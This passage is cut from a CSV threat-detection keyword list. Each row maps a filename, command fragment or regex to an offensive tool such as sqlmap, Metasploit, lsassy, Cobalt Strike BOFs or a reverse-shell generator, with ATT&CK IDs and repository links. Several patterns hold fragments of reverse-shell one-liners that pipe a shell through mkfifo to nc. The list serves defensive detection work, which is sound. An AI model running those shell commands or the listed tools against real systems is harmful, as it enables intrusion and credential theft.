less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*spraykatz*",".{0,1000}spraykatz.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","1","N/A","N/A","8","740","123","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z" "*Spray-Passwords.ps1*",".{0,1000}Spray\-Passwords\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*spring_framework_malicious_jar*",".{0,1000}spring_framework_malicious_jar.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*Spring-cloud-function-SpEL-RCE*",".{0,1000}Spring\-cloud\-function\-SpEL\-RCE.{0,1000}","offensive_tool_keyword","POC","RCE PoC of 0-day Vulnerability found in Spring Cloud (SPEL)","T1059 - T1210 - T1507","TA0002 - TA0040 - TA0043","N/A","N/A","Exploitation tools","https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*spring-core-rce*ROOT.war*",".{0,1000}spring\-core\-rce.{0,1000}ROOT\.war.{0,1000}","offensive_tool_keyword","spring-core-rce","CVE-2022-22965 : about spring core rce","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/spring-core-rce","1","1","N/A","N/A","1","51","18","2022-04-01T15:34:03Z","2022-03-30T14:35:00Z" "*springFramework_CVE-2022-22965_RCE.py*",".{0,1000}springFramework_CVE\-2022\-22965_RCE\.py.{0,1000}","offensive_tool_keyword","POC","SpringFramework CVE-2022-22965","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Axx8/SpringFramework_CVE-2022-22965_RCE","1","0","N/A","N/A","1","76","17","2022-04-01T12:08:45Z","2022-04-01T04:51:44Z" "*spyonweb-get-rootdomains *",".{0,1000}spyonweb\-get\-rootdomains\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*SQ17H1N6(*",".{0,1000}SQ17H1N6\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - 
T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*sql_persister.py*",".{0,1000}sql_persister\.py.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*SqlClrPayload*",".{0,1000}SqlClrPayload.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*sqldumper.py*",".{0,1000}sqldumper\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*sqli_common_shared.rb*",".{0,1000}sqli_common_shared\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Sqli-lab*",".{0,1000}Sqli\-lab.{0,1000}","offensive_tool_keyword","sqli-labs","SQLI-LABS is a platform to learn SQLI Following labs are covered for GET and POST scenarios:","T1190 - T1553","TA0002 - TA0008","N/A","N/A","Web Attacks","https://github.com/Audi-1/sqli-labs","1","1","N/A","N/A","10","4984","1492","2023-12-11T17:06:16Z","2012-05-19T19:41:26Z" "*SQL-Injection-Auth-Bypass-Payloads.*",".{0,1000}SQL\-Injection\-Auth\-Bypass\-Payloads\..{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","161","65","2023-12-12T08:32:23Z","2022-11-18T09:43:41Z" "*SQL-Injection-Libraries*",".{0,1000}SQL\-Injection\-Libraries.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*SQL-Injection-Payloads.*",".{0,1000}SQL\-Injection\-Payloads\..{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","161","65","2023-12-12T08:32:23Z","2022-11-18T09:43:41Z" "*SQLiPy.py*",".{0,1000}SQLiPy\.py.{0,1000}","offensive_tool_keyword","sqlipy","SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.","T1190 - T1210 - T1574","TA0002 - TA0040 - TA0043","N/A","N/A","Network Exploitation tools","https://github.com/codewatchorg/sqlipy","1","1","N/A","N/A","3","250","95","2023-05-08T18:50:41Z","2014-09-22T03:25:42Z" "*SQLiScanner*",".{0,1000}SQLiScanner.{0,1000}","offensive_tool_keyword","SQLiScanner","Automatic SQL injection with Charles and sqlmapapi","T1190 - T1556 - T1210 - T1573","TA0002 - TA0003 - TA0008","N/A","N/A","Web Attacks","https://github.com/0xbug/SQLiScanner","1","1","N/A","N/A","8","776","283","2018-05-01T09:59:47Z","2016-08-28T06:06:32Z" "*sqlite:///ares.db*",".{0,1000}sqlite\:\/\/\/ares\.db.{0,1000}","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1502","474","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" 
"*sqlite3*/dev/null*'.shell*mkfifo*|""/bin/bash"" | nc*'",".{0,1000}sqlite3.{0,1000}\/dev\/null.{0,1000}\'\.shell.{0,1000}mkfifo.{0,1000}\|\""\/bin\/bash\""\s\|\snc.{0,1000}\'","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*sqlite3*/dev/null*'.shell*mkfifo*|""/bin/sh"" | nc*'",".{0,1000}sqlite3.{0,1000}\/dev\/null.{0,1000}\'\.shell.{0,1000}mkfifo.{0,1000}\|\""\/bin\/sh\""\s\|\snc.{0,1000}\'","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*sqlite3*/dev/null*'.shell*mkfifo*|""bash"" | nc*'",".{0,1000}sqlite3.{0,1000}\/dev\/null.{0,1000}\'\.shell.{0,1000}mkfifo.{0,1000}\|\""bash\""\s\|\snc.{0,1000}\'","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*sqlite3*/dev/null*'.shell*mkfifo*|""cmd"" | nc*'",".{0,1000}sqlite3.{0,1000}\/dev\/null.{0,1000}\'\.shell.{0,1000}mkfifo.{0,1000}\|\""cmd\""\s\|\snc.{0,1000}\'","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*sqlite3*/dev/null*'.shell*mkfifo*|""powershell"" | 
nc*'",".{0,1000}sqlite3.{0,1000}\/dev\/null.{0,1000}\'\.shell.{0,1000}mkfifo.{0,1000}\|\""powershell\""\s\|\snc.{0,1000}\'","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*sqlite3*/dev/null*'.shell*mkfifo*|""pwsh"" | nc*'",".{0,1000}sqlite3.{0,1000}\/dev\/null.{0,1000}\'\.shell.{0,1000}mkfifo.{0,1000}\|\""pwsh\""\s\|\snc.{0,1000}\'","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*sqlite3*/dev/null*'.shell*mkfifo*|""zsh"" | nc*'",".{0,1000}sqlite3.{0,1000}\/dev\/null.{0,1000}\'\.shell.{0,1000}mkfifo.{0,1000}\|\""zsh\""\s\|\snc.{0,1000}\'","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*sqlite3*/dev/null*'.shell*mkfifo*|sh -i*|nc*'",".{0,1000}sqlite3.{0,1000}\/dev\/null.{0,1000}\'\.shell.{0,1000}mkfifo.{0,1000}\|sh\s\-i.{0,1000}\|nc.{0,1000}\'","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*sqlmap -*",".{0,1000}sqlmap\s\-.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation 
tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "*sqlmap --forms --batch -u *",".{0,1000}sqlmap\s\-\-forms\s\-\-batch\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*sqlmap.conf*",".{0,1000}sqlmap\.conf.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1059 - T1553 - T1574 - T1210 - T1220","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "*sqlmap.py*",".{0,1000}sqlmap\.py.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1059 - T1553 - T1574 - T1210 - T1220","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "*sqlmap.rb*",".{0,1000}sqlmap\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*sqlmap/data/txt/wordlist.txt*",".{0,1000}sqlmap\/data\/txt\/wordlist\.txt.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*sqlmap4burp*.jar*",".{0,1000}sqlmap4burp.{0,1000}\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*sqlmapapi -*",".{0,1000}sqlmapapi\s\-.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "*sqlmapapi.py",".{0,1000}sqlmapapi\.py","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1059 - T1553 - T1574 - T1210 - T1220","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" 
"*sqlmapapi.py*",".{0,1000}sqlmapapi\.py.{0,1000}","offensive_tool_keyword","sqlipy","SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.","T1190 - T1210 - T1574","TA0002 - TA0040 - TA0043","N/A","N/A","Network Exploitation tools","https://github.com/codewatchorg/sqlipy","1","1","N/A","N/A","3","250","95","2023-05-08T18:50:41Z","2014-09-22T03:25:42Z" "*sqlmapproject/sqlmap*",".{0,1000}sqlmapproject\/sqlmap.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "*sqlmapproject/sqlmap/issues/2442*",".{0,1000}sqlmapproject\/sqlmap\/issues\/2442.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","1","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*SQLmate*",".{0,1000}SQLmate.{0,1000}","offensive_tool_keyword","SQLmate","A friend of SQLmap which will do what you always expected from SQLmap.","T1210 - T1211 - T1021 - T1059","TA0002 - TA0011 - TA0003","N/A","N/A","Web Attacks","https://github.com/s0md3v/sqlmate","1","1","N/A","N/A","5","408","117","2019-05-05T15:53:06Z","2017-10-19T19:55:58Z" "*sqlninja*",".{0,1000}sqlninja.{0,1000}","offensive_tool_keyword","sqlninja","...a SQL Server injection & takeover tool","T1505 - T1526 - T1583 - T1588 - T1590","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Web Attacks","http://sqlninja.sourceforge.net/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*SQLRecon.exe*",".{0,1000}SQLRecon\.exe.{0,1000}","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and 
post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","N/A","Network Exploitation Tools","https://github.com/skahwah/SQLRecon","1","1","N/A","N/A","6","569","107","2024-04-22T20:02:18Z","2021-11-19T15:58:49Z" "*SQLRecon.git*",".{0,1000}SQLRecon\.git.{0,1000}","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","N/A","Network Exploitation Tools","https://github.com/skahwah/SQLRecon","1","1","N/A","N/A","6","569","107","2024-04-22T20:02:18Z","2021-11-19T15:58:49Z" "*SQLServer_Accessible_PotentialSensitiveData.txt*",".{0,1000}SQLServer_Accessible_PotentialSensitiveData\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*SQLServer_DefaultLogin.txt*",".{0,1000}SQLServer_DefaultLogin\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*src/cracker.*",".{0,1000}src\/cracker\..{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*src/genmkvpwd.*",".{0,1000}src\/genmkvpwd\..{0,1000}","offensive_tool_keyword","john","John the 
Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*src/john.asm*",".{0,1000}src\/john\.asm.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*src/ligolo*",".{0,1000}src\/ligolo.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*src/obfuscator.c*",".{0,1000}src\/obfuscator\.c.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","290","44","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*src/Remote/chromeKey/*",".{0,1000}src\/Remote\/chromeKey\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - 
T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*src/Remote/lastpass/*",".{0,1000}src\/Remote\/lastpass\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*src/Remote/sc_config/*",".{0,1000}src\/Remote\/sc_config\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*src/Remote/sc_create/*",".{0,1000}src\/Remote\/sc_create\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - 
